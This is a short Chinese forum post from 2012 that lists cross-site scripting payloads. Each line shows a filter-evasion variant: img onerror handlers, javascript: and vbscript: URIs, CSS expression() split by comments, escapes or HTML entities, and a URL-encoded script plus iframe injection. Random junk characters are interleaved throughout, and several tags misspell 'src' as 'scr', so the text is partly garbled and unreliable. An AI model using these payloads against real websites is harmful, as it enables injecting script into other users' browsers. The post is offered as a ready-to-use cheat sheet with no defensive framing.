<script>alert("跨站")</script> (最常用)
! R6 q0 w! Y. U6 M$ ?# x. z" F<img scr=javascript:alert("跨站")></img>
2 k. S3 V1 a+ j: ]<img scr="javascript: alert(/跨站/)></img>
) E! h M* T( c<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)) Z$ T5 U U8 I" O- x& z* g
<img scr="#" onerror=alert(/跨站/)></img>* x& n3 ^; S6 a6 L# d# i# q
<img scr="#" style="xss:expression(alert(/xss/));"></img>) J2 P$ ^1 `# G
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
0 Y+ H4 Q& @: i7 M<img src=vbscript:msgbox ("xss")></img>
, b! N' }! N, F' C. K<style> input {left:expression (alert('xss'))}</style>
$ I# T9 ~7 v! y8 f: ^) W<div style={left:expression (alert('xss'))}></div>* y2 v1 K" v3 M9 O( @' r# d
<div style={left:exp/* */ression (alert('xss'))}></div>
9 F4 h7 T8 b* j6 j" c<div style={left:\0065\0078ression (alert('xss'))}></div>
( [3 K, d7 ~7 z( |9 n6 M9 ehtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
! B# s: X: c9 n: l" `% Kunicode <div style="{left:expRessioN (alert('xss'))}">
+ u" ^6 y# i* x! g
8 [& a% [, Q3 T9 m4 f9 `"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
; T( }( K M, x |
发表于 2012-9-13 17:15:04
收藏
支持
反对